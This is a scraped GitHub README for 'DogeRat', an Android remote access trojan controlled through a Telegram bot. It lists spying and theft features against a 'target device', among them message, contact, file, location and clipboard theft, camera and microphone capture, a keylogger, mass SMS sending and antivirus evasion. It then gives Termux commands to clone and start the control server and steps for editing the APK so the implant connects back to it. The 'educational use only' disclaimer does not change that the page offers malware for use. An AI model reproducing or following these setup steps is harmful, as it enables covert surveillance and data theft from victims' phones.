Skip to content

A multifunctional Telegram based Android RAT without port forwarding.

License

Notifications You must be signed in to change notification settings

tusarr10/DogeRat

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Logo

A multifunctional Telegram based Android RAT without port forwarding

Panel Screenshot

Logo

Features

  • 🔴 Real time
  • 🌐 custom web view
  • 🔔 notification reader
  • 🔔 notification sender (send custom notification that apper on target device with custom click link)
  • 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
  • 📡 receive information about simcard provider
  • 📳 vibrate target device
  • 🛰️ receive device location
  • ✉️ receive all target message
  • ✉️ send sms with target device to any number
  • ✉️ send sms with target device to all of his/her contacts
  • 👤 recive all target contacts
  • 💻 receive list of all installedd apps in target device
  • 📁 receive any file or folder from target device
  • 📁 delete any file or folder from target device
  • 📷 capture main and front camera
  • 🎙 capture microphone (with custom duration)
  • 📋 receive last clipboard text
  • ✅️ auto start after device boot
  • 🔐 Keylogger {Availbe in apk v1 and v2}
  • ✨ Beautiful telegram bot interface -🤖 Undetectable by antivirus

Requirements

  • APK EDITOR
  • TERMUX
  • For hosting server code, you can use some free services like:
  • Video Tutorials Available Here

  • Keep in mind that these sites can suspend your projects, so it's better to host on your own computer.

Download

Download Termux Download APK Editor

How to host server in Termux

Run the following commands in Termux:

  pkg update && upgrade -y
  pkg install git -y
  git clone https://github.com/shivaya-dav/DogeRat 
  cd DogeRat
  bash start.sh
Enter your bot token 
Enter your chatid 
And hit enter
Now open a new Tab, and give these commands
pkg install openssh
bash port.sh 
Enter your telegram username And hit enter 
Copy url and minimize the termux

Edit apk

  • Open Apk editor
  • select apk
  • choose full edit
  • select decode all files
  • go to assets folder
  • open host.json
  • and enter url
  • in socket replace url https to wss
  • build apk ,start the bott Enjoy

example

  { 
  "host": "https://yoururl.com/", 
  "socket": "wss://yoururl.com/", 
  "webView": "https://google.com/" 
}

🔗 Contact and Social Media Accounts

Telegram Badge Instagram Badge Twitter Badge Youtube Badge

Important Disclaimer

Note: The developer provides no warranty with this software and will not be responsible for any direct or indirect damage caused by the usage of this tool. Dogerat is built for educational and internal use only.

Attention: We do not endorse any illegal or unethical use of this tool. The user assumes all responsibility for the use of this software.

Important: To prevent any fraudulent activity, please ensure that the Instagram username is @CYBERSHIELDX and the Telegram handle is @CYBERSHIELDX. Beware of scams and phishing attempts that use similar usernames or handles.

Thank you for using Dogerat - we hope it serves its intended purpose and helps you achieve your goals!

🍻 Support 🍻

Buy Me A Coffee

Support this project with cryptocurrency:

Bitcoin: 1LeLwYyDHu51875aenZaNcEnMrEbHwEKJd
USDT TRC20: TWX456AoupoYKwCYUKk3ZMWJtNJZRRHnrp

❤️ Thank you Supporters ❤️

Stargazers repo roster on GitHub

About

A multifunctional Telegram based Android RAT without port forwarding.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 91.5%
  • Shell 8.5%